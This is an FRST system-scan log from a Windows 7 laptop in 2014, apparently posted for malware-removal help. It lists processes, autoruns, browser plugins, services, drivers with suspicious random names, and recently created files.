(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
() C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSched.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

==================== Registry (Whitelisted) ==================

HKU\.DEFAULT\...\RunOnce: [{90140000-003D-0000-1000-0000000FF1CE}] - C:\Windows\system32\cmd.exe /C del "C:\ProgramData\Microsoft Help\Rgstrtn.lck" /Q /A:H
HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\...\MountPoints2: E - E:\LaunchU3.exe -a
HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\...\MountPoints2: {24887a34-a929-11e3-a865-00038a000015} - E:\LaunchU3.exe -a
Startup: C:\Users\Ric\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Green -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Partial -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Yellow -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: DropboxExt1 -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: DropboxExt2 -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: DropboxExt3 -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: DropboxExt4 -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: Carbonite.Green -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers-x32: Carbonite.Partial -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers-x32: Carbonite.Yellow -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers-x32: DropboxExt1 -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: DropboxExt2 -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: DropboxExt3 -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x9EFC09E253D5CB01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.msn.com/?ocid=OIE9HP
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Restore = http://www.msn.com/?ocid=OIE9HP
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
SearchScopes: HKLM-x32 - DefaultScope value is missing.
SearchScopes: HKCU - DefaultScope {4C57D5F1-EA69-4478-82D3-94C509422F49} URL = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKCU - {4C57D5F1-EA69-4478-82D3-94C509422F49} URL = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKCU - {A3F26D1D-B8BE-4F06-BAE2-B3A52A885078} URL = http://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
SearchScopes: HKCU - {DECA3892-BA8F-44b8-A993-A466AD694AE4} URL = http://search.yahoo.com/search?p={searchTerms}&fr=chr-offrhap
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: ContributeBHO Class -> {074C1DC5-9320-4A9A-947D-C042949C6216} -> C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll (Adobe Systems, Inc.)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
Toolbar: HKLM-x32 - Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll (Adobe Systems, Inc.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
DPF: HKLM {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} https://support.dell.com/systemprofiler/SysProExe.CAB
DPF: HKLM-x32 {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} https://support.dell.com/systemprofiler/SysProExe.CAB
DPF: HKLM-x32 {C1F8FC10-E5DB-4112-9DBF-6C3FF728D4E3} http://support.dell.com/systemprofiler/DellSystemLite.CAB
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://akamaicdn.webex.com/client/WBXclient-T28L10NSP12_CP1-16851/webex/ieatgpc1.cab
DPF: HKLM-x32 {FFB3A759-98B1-446F-BDA9-909C6EB18CC7} http://utilities.pcpitstop.com/Optimize3/pcpitstop2.dll
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 205.171.3.26 205.171.2.26

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_214.dll ()
FF Plugin: @microsoft.com/GENUINE - C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @canon.com/EPPEX - C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll (CANON INC.)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/JavaPlugin - C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE - C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin - C:\Users\Ric\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin - C:\Users\Ric\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 - C:\Users\Ric\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 - C:\Users\Ric\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: amazon.com/AmazonMP3DownloaderPlugin - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin10171.dll (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Ric\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Ric\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\aolsearch.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\McSiteAdvisor.xml
FF HKLM-x32\...\Firefox\Extensions: [{01A8CA0A-4C96-465b-A49B-65C46FAD54F9}] - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\FirefoxPlugin\{01A8CA0A-4C96-465b-A49B-65C46FAD54F9}
FF Extension: Adobe Contribute Toolbar - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\FirefoxPlugin\{01A8CA0A-4C96-465b-A49B-65C46FAD54F9} [2011-02-26]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome:
=======
CHR HomePage: hxxp://www.msn.com/?pc=BDT3&ocid=BDT3DHP&dt=101013
CHR StartupUrls: "hxxp://www.msn.com/?pc=BDT3&ocid=BDT3DHP&dt=101013",
   "hxxp://blank/"
CHR Extension: (Plug-in Terminal Class) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajpgkpeckebdhofmmjfgcjjiiejpodla [2014-06-05]
CHR Extension: (Google Docs) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-10-06]
CHR Extension: (Google Drive) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-10-06]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-27]
CHR Extension: (YouTube) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-21]
CHR Extension: (Google Search) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-21]
CHR Extension: (Google Wallet) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-04]
CHR Extension: (Gmail) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-21]

==================== Services (Whitelisted) =================

R2 9734BF6A-2DCD-40f0-BAB0-5AAFEEBE1269; C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe [457200 2009-06-02] ()
S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2011-03-02] (Adobe Systems) [File not signed]
R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2255064 2013-10-28] (Broadcom Corporation.)
R2 BOT4Service; C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe [32240 2010-07-14] ()
R2 CLCapSvc; C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvc.exe [262239 2007-08-02] () [File not signed]
R2 CLSched; C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSched.exe [110685 2007-08-02] () [File not signed]
R2 CyberLink Media Library Service; C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\CLML_NTService\CLMLServer.exe [1073152 2007-08-02] (Cyberlink) [File not signed]
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [1436192 2014-05-19] (Fitbit, Inc.)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140456 2011-09-06] ()
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
R2 PCPitstop Scheduling; C:\Program Files (x86)\PCPitstop\PCPitstopScheduleService.exe [86016 2010-09-13] (PC Pitstop LLC) [File not signed]
R2 QDLService2kDell; C:\Program Files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe [330488 2010-01-14] (QUALCOMM, Inc.)
S3 RoxMediaDB13; C:\Program Files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe [1099248 2010-07-16] (Sonic Solutions)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\STacSV64.exe [244736 2010-01-21] (IDT, Inc.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 WMCoreService; C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe [447488 2009-11-26] () [File not signed]
S4 x10nets; C:\Program Files (x86)\Trivia Board Pro 4\X10nets.exe [20480 2001-11-12] (X10) [File not signed]

==================== Drivers (Whitelisted) ====================

S3 61883; C:\Windows\System32\DRIVERS\61883.sys [60288 2009-07-13] (Microsoft Corporation)
S3 ATIAVPCI; C:\Windows\System32\DRIVERS\atinavrr.sys [1200512 2007-07-05] (ATI Technologies Inc.)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [170712 2013-10-28] (Broadcom Corporation.)
R3 ITECIRfilter; C:\Windows\System32\DRIVERS\ITECIRfilter.sys [28264 2011-03-22] (ITE Tech. Inc. )
S3 Netaapl; C:\Windows\System32\DRIVERS\netaapl64.sys [22528 2011-05-10] (Apple Inc.) [File not signed]
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [74752 2011-07-25] (Research In Motion Limited)
S3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44032 2011-07-20] (Research in Motion Ltd)
R2 TurboB; C:\Windows\System32\DRIVERS\TurboB.sys [13784 2009-11-02] ()
U5 VWiFiFlt; C:\Windows\System32\Drivers\VWiFiFlt.sys [59904 2009-07-13] (Microsoft Corporation)
S1 qnmokglx; \??\C:\Windows\system32\drivers\qnmokglx.sys [X]
S1 smvowoli; \??\C:\Windows\system32\drivers\smvowoli.sys [X]
S3 wanatw; system32\DRIVERS\wanatw64.sys [X]
S0 xnvdb; System32\drivers\cixf.sys [X]

==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========

2014-07-16 10:53 - 2014-07-16 10:58 - 00019485 _____ () C:\Users\Ric\Desktop\FRST.txt
2014-07-16 10:48 - 2014-07-16 10:53 - 00000000 ____D () C:\FRST
2014-07-16 10:47 - 2014-07-16 10:47 - 02086912 _____ (Farbar) C:\Users\Ric\Desktop\FRST64.exe
2014-07-15 23:25 - 2014-07-15 23:25 - 00021104 _____ () C:\Users\Ric\Desktop\dds.txt
2014-07-15 23:25 - 2014-07-15 23:25 - 00013578 _____ () C:\Users\Ric\Desktop\attach.txt
2014-07-15 23:04 - 2014-07-15 23:04 - 00688992 ____R (Swearware) C:\Users\Ric\Desktop\dds.com
2014-07-14 11:20 - 2014-07-14 11:20 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-DELL-XPS-1645-Microsoft-Windows-7-Professional-(64-bit).dat
2014-07-14 11:20 - 2014-07-14 11:20 - 00000000 ____D () C:\RegBackup
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-07-12 12:44 - 2014-07-12 22:45 - 00000004 _____ () C:\Windows\msoffice.ini
2014-07-12 12:44 - 2014-07-12 22:45 - 00000000 ____D () C:\Users\Ric\Desktop\AOL Saved PFC
2014-07-11 15:26 - 2014-07-11 15:26 - 00002358 _____ () C:\Users\Ric\Desktop\JRT.txt
2014-07-11 15:19 - 2014-07-11 15:19 - 00000000 ____D () C:\Windows\ERUNT
2014-07-11 14:58 - 2014-07-12 13:01 - 00000000 ____D () C:\Kits
2014-07-11 14:26 - 2014-07-11 14:26 - 01166640 _____ () C:\Windows\Minidump\071114-42635-01.dmp
2014-07-09 15:33 - 2014-07-09 15:34 - 00000000 ____D () C:\Users\roy\1
2014-07-06 14:20 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-07-06 14:17 - 2014-07-13 14:11 - 00000000 ____D () C:\AdwCleaner
2014-07-06 14:15 - 2014-07-06 14:15 - 00000000 ____D () C:\Users\Ric\AppData\Local\GHISLER
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieUserList
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieSiteList
2014-07-06 11:47 - 2014-07-14 11:00 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-07-06 11:46 - 2014-07-06 11:46 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-07-06 11:46 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-07-06 11:46 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-07-06 11:46 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-07-05 22:06 - 2014-07-05 22:06 - 00000000 ____D () C:\Users\roy\AppData\Local\GHISLER
2014-07-05 22:04 - 2014-07-05 22:04 - 00000736 _____ () C:\Users\Public\Desktop\Total Commander 64 bit.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000722 _____ () C:\Users\Public\Desktop\Total Commander.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Total Commander
2014-07-05 14:46 - 2014-07-05 14:46 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Notepad++
2014-07-05 14:25 - 2014-07-05 14:25 - 00453480 _____ () C:\Users\roy\AppData\Local\GDIPFONTCACHEV1.DAT
2014-07-05 14:23 - 2014-07-05 14:23 - 00001417 _____ () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Apple Computer
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Adobe
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Local\Google
2014-07-05 14:22 - 2014-07-09 15:33 - 00000000 ____D () C:\Users\roy
2014-07-05 14:22 - 2014-07-05 14:22 - 00000020 ___SH () C:\Users\roy\ntuser.ini
2014-07-05 14:22 - 2014-07-05 14:22 - 00000000 ____D () C:\Users\roy\AppData\Local\VirtualStore
2014-07-05 14:22 - 2011-08-08 15:10 - 00000000 ____D () C:\Users\roy\AppData\Local\Microsoft Help
2014-07-05 14:22 - 2011-03-06 17:02 - 00000000 ____D () C:\Users\roy\AppData\Local\SoftThinks
2014-07-05 14:22 - 2011-02-26 00:54 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Macromedia
2014-07-05 14:22 - 2009-07-14 00:54 - 00000000 ___RD () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-07-05 14:22 - 2009-07-14 00:49 - 00000000 ___RD () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-07-05 13:53 - 2014-07-05 13:53 - 00139544 ____H () C:\Users\Ric\Downloads\Donna Summer - Last Dance.mp3.z1a
2014-07-05 12:52 - 2014-07-13 13:30 - 00000000 ____D () C:\Roy
2014-07-04 13:27 - 2014-07-04 13:32 - 20787200 _____ () C:\Users\Ric\qdata2010.QDF
2014-07-04 04:24 - 2014-07-04 13:24 - 00001120 _____ () C:\Users\Ric\Downloads\qdata2010 (1)OFXLOG.DAT
2014-07-04 04:19 - 2014-07-04 13:28 - 20787200 _____ () C:\Users\Ric\Downloads\qdata2010 (1).qdf
2014-07-04 04:19 - 2014-07-04 04:19 - 20780389 _____ () C:\Users\Ric\Downloads\qdata2010 (2).qdf
2014-07-02 07:15 - 2014-07-02 07:15 - 00003288 _____ () C:\bootsqm.dat
2014-07-01 21:05 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Desktop\Cohey photos
2014-06-25 20:48 - 2014-07-07 23:57 - 00003194 _____ () C:\Windows\System32\Tasks\{72E0739B-EEC6-4FAB-AD23-1B069503C4B5}
2014-06-25 20:26 - 2014-06-25 20:50 - 00000961 ____H () C:\IPH.PH
2014-06-25 20:20 - 2014-06-25 20:20 - 00208400 _____ (AOL LLC.) C:\Users\Ric\Downloads\AOLDNLD.exe
2014-06-25 19:54 - 2014-06-25 20:02 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Feeqvena
2014-06-25 19:50 - 2014-07-06 13:39 - 00000000 ____D () C:\ProgramData\IculOnse
2014-06-25 19:29 - 2014-06-25 19:30 - 00369792 _____ () C:\Windows\Minidump\062514-34335-01.dmp
2014-06-25 19:23 - 2014-07-01 15:28 - 20742144 _____ () C:\Users\Ric\Downloads\qdata2010.qdf
2014-06-25 19:23 - 2014-07-01 15:27 - 00000896 _____ () C:\Users\Ric\Downloads\qdata2010OFXLOG.DAT
2014-06-23 19:36 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Desktop\EB PICS
2014-06-23 19:04 - 2014-06-23 19:05 - 00370536 _____ () C:\Windows\Minidump\062314-33337-01.dmp
2014-06-20 21:32 - 2014-06-20 21:32 - 00000000 ____D () C:\Users\Ric\Documents\Roxio Projects
2014-06-20 21:25 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Desktop\Mary picture folder
2014-06-18 16:45 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Documents\Divorce Civi lCover Sheet
2014-06-18 16:44 - 2014-06-18 16:45 - 01051112 _____ () C:\Users\Ric\Documents\Divorce Civi lCover Sheet.zip
2014-06-18 16:31 - 2014-06-18 16:32 - 00378088 _____ () C:\Windows\Minidump\061814-37799-01.dmp
2014-06-18 16:20 - 2014-06-18 16:20 - 00262144 _____ () C:\Windows\Minidump\061814-48672-01.dmp
2014-06-18 09:49 - 2014-06-18 09:49 - 00000000 ____D () C:\ProgramData\Package Cache
2014-06-18 09:48 - 2014-06-18 09:48 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-06-18 09:47 - 2014-06-18 09:47 - 00000000 ____D () C:\AMD
2014-06-18 09:39 - 2014-06-18 09:40 - 00569856 _____ () C:\Windows\Minidump\061814-35069-01.dmp
2014-06-17 16:54 - 2014-06-17 16:55 - 00369840 _____ () C:\Windows\Minidump\061714-74116-01.dmp
2014-06-17 16:42 - 2014-06-17 16:43 - 00369808 _____ () C:\Windows\Minidump\061714-29546-01.dmp
2014-06-16 17:08 - 2014-06-16 17:09 - 00275760 _____ () C:\Windows\Minidump\061614-35178-01.dmp
2014-06-16 16:04 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Documents\Divorce folder
2014-06-16 09:54 - 2014-06-16 09:54 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\WMCore
2014-06-16 09:53 - 2014-06-16 09:53 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\WirelessManager
2014-06-16 09:43 - 2014-06-16 09:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel® Matrix Storage Manager
2014-06-16 09:38 - 2014-07-07 22:27 - 00000000 ____D () C:\ProgramData\QUALCOMM
2014-06-16 09:38 - 2014-06-16 09:38 - 00000000 ____D () C:\Windows\Dell
2014-06-16 09:38 - 2014-06-16 09:38 - 00000000 ____D () C:\Program Files (x86)\QUALCOMM
